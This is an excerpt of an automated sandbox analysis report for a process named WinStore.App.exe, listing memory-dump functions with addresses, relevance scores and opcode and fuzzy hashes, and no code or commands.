Instruction Fuzzy Hash: F501D626D0EAC14FE72A8AB9686D0307FE1EF6764071850EFC0598B0F7D8559D4AC355

Function 00007FF848F30C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c72fb75b3d661f3c2f14dc108f2f5d49e7e6831564515a6b5be907cbf40e2e
Instruction ID: a02083067e24816490d66ef5fc811f30c1f45b9e89c4ac050672ebd6fc9f43b7
Opcode Fuzzy Hash: 42c72fb75b3d661f3c2f14dc108f2f5d49e7e6831564515a6b5be907cbf40e2e
Instruction Fuzzy Hash: 9111A031E0D68D8FE702FB7898411AC7BB0EF82390F1546F7D844DB2D2DA3855458785

Function 00007FF848F30C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc6fb0b961c76bb9b5878c3fa1ef3f516e532fd807b528083e26d1b03f0871ca
Instruction ID: 16626a922851020ac03bc8601c02882963f7425da83bd921f1d26abc0a511fbb
Opcode Fuzzy Hash: cc6fb0b961c76bb9b5878c3fa1ef3f516e532fd807b528083e26d1b03f0871ca
Instruction Fuzzy Hash: E3012931D0D2899FE716FB6488441A97FB0EF82390F1541F7D844DB2D2DA386A45CB85

Function 00007FF848F30C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff1ea687f60ac53be15660cece56158c6bb389d39cf0a9a39fee308890b7160
Instruction ID: e997aba60f4af9376fc8cd1e9103cd0bee8e2071b6e122f731a5aa4e31c04152
Opcode Fuzzy Hash: 4ff1ea687f60ac53be15660cece56158c6bb389d39cf0a9a39fee308890b7160
Instruction Fuzzy Hash: F8015630D0D2899FE712FB6488440AD7FB0EF82390F1842F7D844DB2D2DA38AA44C785

Function 00007FF849321A32 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec64224153a72f2d583d564b7516f3e56d7e9d207009e5f1bf5aea5a1a45169d
Instruction ID: f55ff93cdc91be445b39257420e4e984034dbdfdb58d0cbaacdaf721fa06da1f
Opcode Fuzzy Hash: ec64224153a72f2d583d564b7516f3e56d7e9d207009e5f1bf5aea5a1a45169d
Instruction Fuzzy Hash: 45F04F3284E2C59FD316DFB089519997FB4AF43254F1910FAD446CA0A2C6695A06C752

Function 00007FF849330409 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6384db2cad196a5ebb226c3e61ef5117a7b939353d1d205cc1fb12c0ff13c67c
Instruction ID: e0b6303615a9ef45d362165555cfc7c832b754414c78be8fc8d889e52064840c
Opcode Fuzzy Hash: 6384db2cad196a5ebb226c3e61ef5117a7b939353d1d205cc1fb12c0ff13c67c
Instruction Fuzzy Hash: 09F0822160CB884FC76A563D58680617FE1DB6651134902EFC049C75F3DD55AC848341

Function 00007FF84932EBF9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a1d9613e0f41d827564753753a589e2ee8be8beaf1f75a02a036366c1c129f8
Instruction ID: 125a2e873c92ff217be71a966191fac1c9387f838f4a180a6fec8e91e1c038a7
Opcode Fuzzy Hash: 9a1d9613e0f41d827564753753a589e2ee8be8beaf1f75a02a036366c1c129f8
Instruction Fuzzy Hash: CAF0A031B0CFC80FC729962E586D061BFE1DB6A11234A02EFC085C76B3DD59AC888341

Function 00007FF8493289C6 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f1d2f7886bbbba8eab587b9c3bd652d5ca67652723d7cc19efea4cdbcb573b
Instruction ID: dd084b059c9132788b1e2a3e5934a1f2d8cc477bf89afbf0d0937c0005d0a0f5
Opcode Fuzzy Hash: 06f1d2f7886bbbba8eab587b9c3bd652d5ca67652723d7cc19efea4cdbcb573b
Instruction Fuzzy Hash: 13F05E31A0C58ACFE364EF08C491BE97292EB863A0F194675D00DC71D2DA79AD858781

Function 00007FF84932272A Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac58c2cd3f244f8bd924f3f798b853089095dd9f25adccf653f55043418728c7
Instruction ID: e16514aa6a3c6c2509fb5b256141fb8c25f42c515985613607b5f6414c7ff750
Opcode Fuzzy Hash: ac58c2cd3f244f8bd924f3f798b853089095dd9f25adccf653f55043418728c7
Instruction Fuzzy Hash: AFF0B431A0D3C74FEB26AF648C915A83B90DF13390B1819FAC448CF1D3D5A86815D311

Function 00007FF848F30CF6 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a33fe5654e5d306209e801c9ff3426ba342e68540bd1d4051af25d6b1577f01
Instruction ID: 7403a471272fe04670b77e4e4d0a5f2a19df371c8535d4134a4553327e4f6949
Opcode Fuzzy Hash: 6a33fe5654e5d306209e801c9ff3426ba342e68540bd1d4051af25d6b1577f01
Instruction Fuzzy Hash: 77F09A31A0C20ADEE748FB28C4456B9B6E0EB85381F0441BBD809D32C1DB386580CA44

Function 00007FF84932AB61 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e750af60379bfaf0fefba7b102a2ec226ba5855febc939d5ab291218b26ba0a
Instruction ID: 7efa5288e560e7a780cfebb11c0adf22e1f85d7e216a823f3bde10f8787c93c4
Opcode Fuzzy Hash: 8e750af60379bfaf0fefba7b102a2ec226ba5855febc939d5ab291218b26ba0a
Instruction Fuzzy Hash: 78E0863284D5C85FEB327F705C564E57FB0EF43181F0952F6E58C86093EA186618C751

Function 00007FF848F32059 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16aa5848e8b16e7a4923041183e2fb764416e1f7440d9d5848bf56511e8c2e64
Instruction ID: fd30eb5d39a6a39afa162d364bd7b04ce14a71ecd2e3255d8ade54c8e368c6c1
Opcode Fuzzy Hash: 16aa5848e8b16e7a4923041183e2fb764416e1f7440d9d5848bf56511e8c2e64
Instruction Fuzzy Hash: 04E01A35E0C4168BF755B384C8913AA63A1EB88380F1404BAE90E973C5DF28AE048619

Function 00007FF848F3659F Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17393c0e69fa27ce3ff3b12394d369d4220a0b8b5bd9c08cb344669992dca5c7
Instruction ID: df6f7f69ec03487de43fec7fb051525d83e23f7c9e6a03a6f9cb816337130b7e
Opcode Fuzzy Hash: 17393c0e69fa27ce3ff3b12394d369d4220a0b8b5bd9c08cb344669992dca5c7
Instruction Fuzzy Hash: 89E0EC21E1C5554EF699B268442537950C1AB88791F48417A944ED33C3DD0C188042A6

Function 00007FF848F30B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e757316dbc60ef404f881530e4a45e0a8044c33ddaec1649c9cf004b9411ba8b
Instruction ID: a27c21f86215c111f7eaa988aed000caf6249fda9bfe72f3817dd5e176f4a3e3
Opcode Fuzzy Hash: e757316dbc60ef404f881530e4a45e0a8044c33ddaec1649c9cf004b9411ba8b
Instruction Fuzzy Hash: 34C0123062880E8FDA80BB28C888824BBA0FB0E245FD910E0E00CC71A1D66998A08704

Function 00007FF848F306A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e75ce6de41251b7245575d1327e4a39e3ca77f8d05d269fbb27d30311325e7
Instruction ID: f18ec2d517529639a413f08209e873c715cd7df9a912290fd91390ed09b725d2
Opcode Fuzzy Hash: 39e75ce6de41251b7245575d1327e4a39e3ca77f8d05d269fbb27d30311325e7
Instruction Fuzzy Hash: D5C08C20D1F80F0AF401B32E24020BCA1005BC4390FD00173C80C801C5BE0D22C5415E

Function 00007FF848F312D8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592336207b0fd429919af12de50390d5ea831fc2a45581b9b788df7b3f0c4ac1
Instruction ID: 87a704e6fbffe29c28f095cbb9ecc95918e9955afe51f43a1eafe06385cc4aef
Opcode Fuzzy Hash: 592336207b0fd429919af12de50390d5ea831fc2a45581b9b788df7b3f0c4ac1
Instruction Fuzzy Hash: B3C04C34555C498FC948FB2AC88991477A0FB59215BD500A0E409C71B1D669DCD5C745

Function 00007FF84932322B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc6c852c1690989550c2f07d973ebc65c7ec7e72967100e909e6a1528f7dfc5d
Instruction ID: 262a216efed85c2d9727fb4b7fc8824425fa2df116456de66b72b8d9b7039876
Opcode Fuzzy Hash: cc6c852c1690989550c2f07d973ebc65c7ec7e72967100e909e6a1528f7dfc5d
Instruction Fuzzy Hash: B5D0C930A0C6D38DF9397E01C02033B51909F02FC0E60607EC15F458C2CE1CB5016207

Function 00007FF848F3251B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c196d4ce1f3107cff43a4b6c7b68fca471fb212fe38a7e252384754369a193
Instruction ID: 1d15e96665858c7f35d914f31e49ee58f2eb805326ff0cbec0be2a7b9f1cf36d
Opcode Fuzzy Hash: 31c196d4ce1f3107cff43a4b6c7b68fca471fb212fe38a7e252384754369a193
Instruction Fuzzy Hash: AFC04C31F1E81626E555B358542137F08539B44784F941035E00ED67CACE4E5F5112DA

Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46d805e7806aa06fb27ab36205b3a8568fbf8b812599b035d4541ab75922a43
Instruction ID: bcd2d8bd1434325fd261f62f188460f4d9abc2388bbee19db9e74972d8cd89dc
Opcode Fuzzy Hash: a46d805e7806aa06fb27ab36205b3a8568fbf8b812599b035d4541ab75922a43
Instruction Fuzzy Hash: 67B01210C6F40F05E444337A1842079B0405B84240FC001B2D80C901C1A94D1194025A

Non-executed Functions

Function 00007FF84932C959 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03079ffc0d1eb1b78cc933f6d7af9f67ee8fa390edebf8806f8e75d07bf34235
Instruction ID: 496564302b5777a03d56f1335aaa23d963812bbaf45ab66a765538fa6588943e
Opcode Fuzzy Hash: 03079ffc0d1eb1b78cc933f6d7af9f67ee8fa390edebf8806f8e75d07bf34235
Instruction Fuzzy Hash: E341DDA644E7E15FD3138B319C629923F71AE13254B4F46DBD4C0CF8A3E2585A29C3B2

Function 00007FF848F309B0 Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FF848F30B3E
"s9, xrefs: 00007FF848F30B46
c9, xrefs: 00007FF848F30B56
!k9, xrefs: 00007FF848F30B4E

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: f07f3cf1142202e41edec45184615b9311aedab69fbb054c63737bd8a207297e
Instruction ID: e985c0d3395a93dd6f87f458bc99b439084c3e448b70d44cc5dba53f903a7c36
Opcode Fuzzy Hash: f07f3cf1142202e41edec45184615b9311aedab69fbb054c63737bd8a207297e
Instruction Fuzzy Hash: F4515D17A2F46AA9E65137BDB4111FE6B64EF852B9F084377E44C8D1C38E0D608682FD

Analysis Process: WinStore.App.exePID: 3652, Parent PID: 3136COMMON

Executed Functions

Function 00007FF848F406B6 Relevance: 2.8, Strings: 1, Instructions: 1509COMMON

Download Yara Rule

Strings

L_H, xrefs: 00007FF848F417EF

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_WinStore.jbxd

Similarity

API ID:
String ID: L_H
API String ID: 0-4018862940
Opcode ID: eb0f1bd99ec544ddb9752799f8a64e76501e18f52fe22a932ec94d50bfb26067
Instruction ID: 066dc3fa73f2d511a3fdc80f097b348655034e61340ad9a7871bf9978a2cc877
Opcode Fuzzy Hash: eb0f1bd99ec544ddb9752799f8a64e76501e18f52fe22a932ec94d50bfb26067
Instruction Fuzzy Hash: 89B26431E1C91A9FEB94FB2884557B973A2FFA8740F1445BAD40DD32C6DF28AC828745

Function 00007FF84932E5A4 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

;_H, xrefs: 00007FF84932E970

Memory Dump Source

Source File: 0000000C.00000002.2303592218.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID: ;_H
API String ID: 0-1267907542
Opcode ID: ebf602d7c20d57fb8ad0ab7aa7dd6bd195241d500b0c64639f90a1e2ccc125ca
Instruction ID: b0b26e659ec7e0f31f2ce28847c80cc1efbd7b220452aafb21e448773c1e5dd7
Opcode Fuzzy Hash: ebf602d7c20d57fb8ad0ab7aa7dd6bd195241d500b0c64639f90a1e2ccc125ca
Instruction Fuzzy Hash: 7AD1A331E1C9594FE7A8FB2C945A6B973D2FF99790F4401BAD40ED32C2DE286C428781

Function 00007FF848F30D48 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FF848F30DF3

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: ceb13397ce0a5c25edf1dbb8cceb0b7585d9b296300efe4ffa9a47c22262a018
Instruction ID: 76c4b7c61c70b0ed47e7e8c4be5108fb8699531ceede16e9b40d1e5e48ee4dd3
Opcode Fuzzy Hash: ceb13397ce0a5c25edf1dbb8cceb0b7585d9b296300efe4ffa9a47c22262a018
Instruction Fuzzy Hash: 6B91CF72A1DA999FE789EB2C88697B97FE1FB95341F4402AFC049D72D2CF7918008711

Function 00007FF8493308C1 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2303592218.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e741e52c62d1177be76d617053a603aeebf6e5dfcea87826789a82dc7491004
Instruction ID: 54819a0804a6d9d298d8ff28e27b6b5f226cf0cd15d6051947ab965a49537935
Opcode Fuzzy Hash: 5e741e52c62d1177be76d617053a603aeebf6e5dfcea87826789a82dc7491004
Instruction Fuzzy Hash: 83710631B5DA8A0FE3B9EB2854556B977D2EF99750F4401BFD44DC72C3DE24A9028382

Function 00007FF848F30E43 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1528bc490cc700002e32c54713c8c6d6bb6ab547196aa0b226eaa0367a1f3b9d
Instruction ID: a34e7b187132312a0728665fe8e84d6d471fdb08cd8bf10d6a6dd78ed66315b2
Opcode Fuzzy Hash: 1528bc490cc700002e32c54713c8c6d6bb6ab547196aa0b226eaa0367a1f3b9d
Instruction Fuzzy Hash: 51518A72A1DA599EE788EB2C9859BBA7FE1EB85351F4402BFC009D77D1CB7914118B00

Function 00007FF848F6339D Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

@aH, xrefs: 00007FF848F63458
M, xrefs: 00007FF848F63346

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: @aH$M
API String ID: 0-2096102131
Opcode ID: c0e1fb68590a6608fc9c6c39960543c500f32791c820ba1beda149313d8c6181
Instruction ID: f2c5cdce381de154df15bebe7590badfe117551ff240f23b3687a3d6f5a22c01
Opcode Fuzzy Hash: c0e1fb68590a6608fc9c6c39960543c500f32791c820ba1beda149313d8c6181
Instruction Fuzzy Hash: 8B91AE32E1D98A5FE788FB2C84566B5B2D1EF95340F0452B9C40ED72C3DE2DA8878745

Function 00007FF849321AAB Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

(.I, xrefs: 00007FF849321AEE

Memory Dump Source

Source File: 0000000C.00000002.2303592218.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID: (.I
API String ID: 0-2083108193
Opcode ID: ff31a4f01ac2d3f5d9fcc0a6a15fb09f5e9569bfa5621122bbbc092cf3c503df
Instruction ID: 61a2d4f479ee63fabb56c14d9cda4305ce1204086b54cb19da6cc8bf59ac2474
Opcode Fuzzy Hash: ff31a4f01ac2d3f5d9fcc0a6a15fb09f5e9569bfa5621122bbbc092cf3c503df
Instruction Fuzzy Hash: C8818D30D1D58E9EEBA9EFE48454ABDBBF1FF46380F1015BAD00ED7192EA286C418751

Function 00007FF849323D52 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FF849323DC2

Memory Dump Source

Source File: 0000000C.00000002.2303592218.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2eb12587a4b8d9fbd93fd92f6cbc1c92d0b3987e380105aa76b72f662e61fc4a
Instruction ID: 96ebea95c2d5a959f98ef41cc56ee1112cff4f1ab9edb960ad2015ffe5d1ef22
Opcode Fuzzy Hash: 2eb12587a4b8d9fbd93fd92f6cbc1c92d0b3987e380105aa76b72f662e61fc4a
Instruction Fuzzy Hash: E1518D31D0D68E9FEB59EFA8D4545BDBBB1FF45740F1044BAC00AEB286CA386905CB51

Function 00007FF848F6E321 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

0zH, xrefs: 00007FF848F6E3C4

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: 0zH
API String ID: 0-1873325940
Opcode ID: 6f4ef40391cd764a94ee9e11c1bf6e10378500fda91ac6a1a312bf6b3a0c25da
Instruction ID: 4d0499b1f8080dcf48c39b05cd3918ba31154769019864803de1291ebd42ac90
Opcode Fuzzy Hash: 6f4ef40391cd764a94ee9e11c1bf6e10378500fda91ac6a1a312bf6b3a0c25da
Instruction Fuzzy Hash: F9218432E1C91A4FE794F7189459ABC7791EB947A0F14077AC409E72D5DE285C838780

Function 00007FF848F6A589 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F6A5A6

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 86f3394ac5698ee5f3ad3902896cfcb8bc4d6ae60e54cc086837e61232f15de2
Instruction ID: 9536eb16c8d0fea44e5c36a4ed5911b7be6d7681ac080e1597f6c985384cde0f
Opcode Fuzzy Hash: 86f3394ac5698ee5f3ad3902896cfcb8bc4d6ae60e54cc086837e61232f15de2
Instruction Fuzzy Hash: 8FF06571A0E7C44FC71AEB3484694547FA0EF6721174A52EEC045CF1A3EB2D8886CB01

Function 00007FF848F62F09 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F62F26

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: a2930ba56d7aff269278ee379f21d73c811e344c53d3d93bb80a24c638244710
Instruction ID: 8ad29aa8817c90425e5848afb37f5a90a714243db3a78214a619a79a745cb2dc
Opcode Fuzzy Hash: a2930ba56d7aff269278ee379f21d73c811e344c53d3d93bb80a24c638244710
Instruction Fuzzy Hash: 54F0ED3060E3C44FC74AAB348869454BFA0EF6720074A42EEC046CF1A7EA2E8886C700

Function 00007FF848F61C39 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F61C56

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 2caeb01b6ac837416cbc7f2048a2aa87df7349160a24a79264757a2ed9b018f2
Instruction ID: 98c300ed4980577cea59abdf7011f6bb56965edc6b765da0c95d89cc95fb91d6
Opcode Fuzzy Hash: 2caeb01b6ac837416cbc7f2048a2aa87df7349160a24a79264757a2ed9b018f2
Instruction Fuzzy Hash: 35F0657190E3C44FC756E7344869455BFA0EF6721174951EEC086CF1A7EA2D9885C701

Function 00007FF848F436D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F436F6

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: ba651bb9563b214bd305eb69ec87b7157b9b3441413dcd524483f5d950fdf2fa
Instruction ID: ac0423ba78f8ec62c32b183bec341c0b830309248a4eb32260c6f47fd2a16d14
Opcode Fuzzy Hash: ba651bb9563b214bd305eb69ec87b7157b9b3441413dcd524483f5d950fdf2fa
Instruction Fuzzy Hash: 39E06D71A0E7C04FCB16AA388869854BFA0EF6721174A41EFC046CF1A7EA2D8889C701

Function 00007FF848F6A619 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F6A636

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: a8ec9c4fd7f5d7de72d5cc63522a2182f123f23e5189984d8d4062ac14263260
Instruction ID: fc04791c7e5cc8b427c50b8cdc6aec675fbdc4dca22fb354c2898d792ce895b2
Opcode Fuzzy Hash: a8ec9c4fd7f5d7de72d5cc63522a2182f123f23e5189984d8d4062ac14263260
Instruction Fuzzy Hash: 20E06D7160E7C44FC71AAB34886D454BFA0EF6721174A52EEC045CF1A7EA2D8889C701

Function 00007FF848F6E789 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F6E7A6

Memory Dump Source

Source File: 0000000C.00000002.2300151545.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f61000_WinStore.jbxd

Similarity

